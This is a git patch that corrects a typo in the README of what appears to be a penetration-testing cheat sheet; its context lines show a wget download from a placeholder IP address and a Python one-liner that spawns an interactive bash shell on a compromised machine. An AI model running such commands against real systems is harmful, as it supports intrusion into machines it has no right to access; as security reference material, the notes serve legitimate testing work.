From ac0e36c95a7d89afd7605cdd7cd19d193cdccdbb Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 3 Aug 2022 15:33:58 -0400 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5f32601..e83a4c8 100644 --- a/README.md +++ b/README.md @@ -386,7 +386,7 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE} ```bash # About: A command spawn a new shell using python -# Download: MAy or may not be installed on server machine +# Download: May or may not be installed on server machine # Usage python3 -c 'import pty;pty.spawn("/bin/bash")'